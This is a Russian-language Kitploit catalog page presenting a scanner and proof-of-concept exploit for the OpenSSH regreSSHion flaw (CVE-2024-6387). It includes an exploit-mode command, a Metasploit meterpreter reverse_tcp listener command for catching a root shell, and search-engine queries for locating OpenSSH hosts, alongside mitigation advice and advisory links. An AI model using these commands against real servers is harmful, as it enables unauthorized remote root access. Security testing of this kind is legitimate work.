Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-6387 — Уязвимость удалённого неаутентифицированного выполнения кода в сервере OpenSSH (CVE-2024-6387) | Kitploit
Инструменты/GitHubGitHub/karmakstylez/cve-2024-6387
РазведкаСканеры уязвимостейЭксплуатацияСетевая безопасностьТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubkarmakstylez/cve-2024-6387

CVE-2024-6387

Уязвимость удалённого неаутентифицированного выполнения кода в сервере OpenSSH (CVE-2024-6387)

Репозиторий
1884742 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

openssh CVE-2024-6387.py - PoC

Важные примечания!!!

Эксплойт работает ТОЛЬКО для 32-битных OpenSSH-серверов. Это связано с тем, что PoC использует 32-битные указатели! Также известно, что некоторые версии уже пропатчены, и не каждый сервер уязвим. Протестировано на: Kali Linux, ParrotSec, Ubuntu 22.04

📜 Описание

Удалённое неаутентифицированное выполнение кода в сервере OpenSSH

CVE-2024-6387.py — это лёгкий и эффективный инструмент, предназначенный для выявления серверов, работающих на уязвимых версиях OpenSSH, с особым акцентом на недавно обнаруженную уязвимость regreSSHion (CVE-2024-6387). Этот скрипт обеспечивает быстрое сканирование множества IP-адресов, доменных имён и CIDR-диапазонов для обнаружения потенциальных уязвимостей и обеспечения безопасности вашей инфраструктуры.

В сервере OpenSSH (sshd) была обнаружена гонка (race condition) в обработчике сигналов: если клиент не проходит аутентификацию в течение LoginGraceTime секунд (120 по умолчанию, 600 в старых версиях OpenSSH), обработчик SIGALRM в sshd вызывается асинхронно. Однако этот обработчик сигнала вызывает различные функции, которые не являются async-signal-safe, например syslog().

📁 Содержание

  • 📖 Подробности
  • 🌟 Возможности
  • ⚙️ Использование
  • O Вывод
  • 🔍 Обнаружение хостов
  • 🛠️ Смягчение угрозы
  • 💁 Ссылки
  • 📌 Автор
  • 📢 Отказ от ответственности

✍🏻 Подробности

Технические подробности можно найти здесь.

Ошибка, обнаруженная исследователями Qualys в мае 2024 года и получившая идентификатор CVE-2024-6387, вызвана гонкой в обработчике сигналов в sshd, которая позволяет неаутентифицированным удалённым злоумышленникам выполнять произвольный код с правами root.

«Если клиент не проходит аутентификацию в течение LoginGraceTime секунд (120 по умолчанию), обработчик SIGALRM в sshd вызывается асинхронно и вызывает различные функции, которые не являются async-signal-safe»,

«Удалённый неаутентифицированный злоумышленник может воспользоваться этой ошибкой для выполнения произвольного кода с правами root».

🌟 Возможности

  • Быстрое сканирование: Быстрое сканирование множества IP-адресов, доменных имён и CIDR-диапазонов на предмет уязвимости CVE-2024-6387.
  • Получение баннеров: Эффективное получение SSH-баннеров без аутентификации.
  • Определение Grace Time: Возможность определить, устранили ли серверы уязвимость с помощью настройки LoginGraceTime.
  • Поддержка IPv6: Полная поддержка IPv6-адресов как для прямого сканирования, так и для сканирования по имени хоста.
  • Многопоточность: Использование потоков для параллельных проверок, что значительно сокращает время сканирования.
  • Подробный вывод: Предоставляет понятный вывод с эмодзи-кодировкой, обобщающий результаты сканирования.
  • Проверка портов: Определяет закрытые порты и предоставляет сводку по не отвечающим хостам.
  • Определение пропатченных версий: Распознаёт известные пропатченные версии и исключает их из отчётов об уязвимостях.

⚙️ Использование

Сканирование OpenSSH-сервера

Требование: актуальная версия python3

root@kitploit:~
### Command Line Arguments
mode: Selects the operation mode. Choices are scan or exploit.
-T, --targets: IP addresses, domain names, file paths containing IP addresses, or CIDR network ranges.
-f, --outputfile: File to save results to (e.g., result.json).
-g, --gracetimecheck: Time in seconds to wait after identifying the version to check for LoginGraceTime mitigation (default: 120 seconds).
-n, --nic: Network NIC (default: 'eth0').
-o, --output: Output format for results (choices: 'csv', 'txt', 'json').
-p, --port: Port number to check or exploit (default: 22).
-s, --speed: Number of threads to increase race condition chances (default: 10).
-t, --timeout: Connection timeout in seconds (default: 1 second).
-H, --resolve-hostnames: Resolve Hostnames

Примеры

Сканирование одного URL/IP

root@kitploit:~
python3 CVE-2024-6387.py scan -T example.com -p 22

Запуск эксплойта для одного домена / IP

root@kitploit:~
python3 CVE-2024-6387.py exploit -T example.com -p 22 -n eth0

Процесс повышения привилегий

Перехват payload

Всё, что вам нужно сделать, — сначала выполнить приведённую ниже команду (заменив {yourip} на ваш IP-адрес), а затем запустить эксплойт с помощью приведённой выше команды

root@kitploit:~
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST {yourip}; set LPORT 9999; exploit -j"

Вывод

Инструмент выводит в консоль результаты с цветовой кодировкой для лучшей читаемости:

Зелёный: успешное подключение или операция. Красный: ошибка подключения или сбой. Жёлтый: предупреждения или важная информация. Голубой: общая информация или обновления статуса.

🔍 Обнаружение хостов

  • Hunter: /product.name="OpenSSH"
  • FOFA: app="OpenSSH"
  • SHODAN: product:"OpenSSH"
  • CENSYS: (openssh) and labels=remote-access

🛠️ Смягчение угрозы

  • Управление обновлениями: Своевременное применение доступных обновлений для OpenSSH критически важно для закрытия окна уязвимости. Своевременная установка патчей гарантирует, что известные эксплойты не смогут быть использованы против ваших систем, тем самым сокращая возможности для злоумышленников.

  • Усиленный контроль доступа: Ограничение SSH-доступа с помощью сетевых средств контроля добавляет дополнительный уровень защиты. Этот подход минимизирует подверженность риску со стороны потенциальных злоумышленников, ограничивая SSH-подключения только авторизованными сетями или IP-адресами. Такие меры, как правила межсетевого экрана или использование VPN для безопасного доступа, могут эффективно обеспечить соблюдение этих ограничений.

  • Сегментация сети: Разделение сети на сегменты помогает сдержать последствия возможного взлома. Изолируя критические системы и конфиденциальные данные от менее важных частей сети, вы снижаете риск горизонтального перемещения злоумышленников. Такая сегментация может быть дополнена строгим контролем доступа и мониторингом для обнаружения и реагирования на любые несанкционированные попытки проникновения в эти сегменты.

  • Системы обнаружения вторжений (IDS): Развёртывание систем обнаружения вторжений (IDS) или предотвращения вторжений (IPS) обеспечивает мониторинг сетевого трафика и системных журналов в реальном времени. Эти системы могут обнаруживать подозрительную активность и потенциальные попытки эксплуатации, связанные с уязвимостью regreSSHion. Оповещения, генерируемые такими системами, позволяют оперативно проводить расследование и устранять угрозу до того, как будет нанесён значительный ущерб.

  • Мониторинг попыток эксплуатации: Непрерывный мониторинг сетевых и системных журналов имеет решающее значение. Обращайте внимание на любые необычные закономерности или действия, которые могут указывать на попытку эксплуатации уязвимости OpenSSH. Такой упреждающий подход помогает выявлять угрозы и реагировать на них до того, как они смогут нанести вред.

💁 Ссылки

  • Автор оригинала: CVE-2024-6387 Scanner
  • Автор оригинала: CVE-2024-6387 PoC

Дополнительные ссылки

  • http://www.openwall.com/lists/oss-security/2024/07/01/12
  • https://access.redhat.com/security/cve/CVE-2024-6387
  • https://bugzilla.redhat.com/show_bug.cgi?id=2294604
  • https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt
  • https://github.com/zgzhang/cve-2024-6387-poc
  • https://ubuntu.com/security/CVE-2024-6387
  • https://ubuntu.com/security/notices/USN-6859-1
  • https://www.suse.com/security/cve/CVE-2024-6387.html
  • https://explore.alas.aws.amazon.com/CVE-2024-6387.html
  • https://archlinux.org/news/the-sshd-service-needs-to-be-restarted-after-upgrading-to-openssh-98p1/
  • https://www.openssh.com/txt/release-9.8
  • https://lists.mindrot.org/pipermail/openssh-unix-announce/2024-July/000158.html
  • https://lists.mindrot.org/pipermail/openssh-unix-dev/2024-July/041431.html
  • https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server
  • https://www.theregister.com/2024/07/01/regresshion_openssh/
  • https://news.ycombinator.com/item?id=40843778

📢 Отказ от ответственности

  • Важное примечание:
    • Этот инструмент разработан и используется исключительно для авторизованного тестирования на проникновение и учений red team. Он предназначен для выявления и эксплуатации уязвимостей сервера OpenSSH в Linux-системах на базе glibc. Несанкционированное использование этого инструмента строго запрещено. Владелец этого инструмента не несёт ответственности за любой несанкционированный доступ или злонамеренное использование инструмента.
  • Правовое уведомление:
    • Несанкционированное использование этого инструмента на системах или в сетях без явного разрешения соответствующих владельцев может нарушать действующее законодательство и нормативные акты. Пользователи несут ответственность за соблюдение правовых и этических стандартов, регулирующих тестирование и оценку кибербезопасности.
Скачать инструмент
  • https://security-tracker.debian.org/tracker/CVE-2024-6387
  • https://github.com/oracle/oracle-linux/issues/149
  • https://github.com/rapier1/hpn-ssh/issues/87
  • https://stackdiary.com/openssh-race-condition-in-sshd-allows-remote-code-execution/
  • https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0010
  • http://www.openwall.com/lists/oss-security/2024/07/01/13
  • https://security.netapp.com/advisory/ntap-20240701-0001/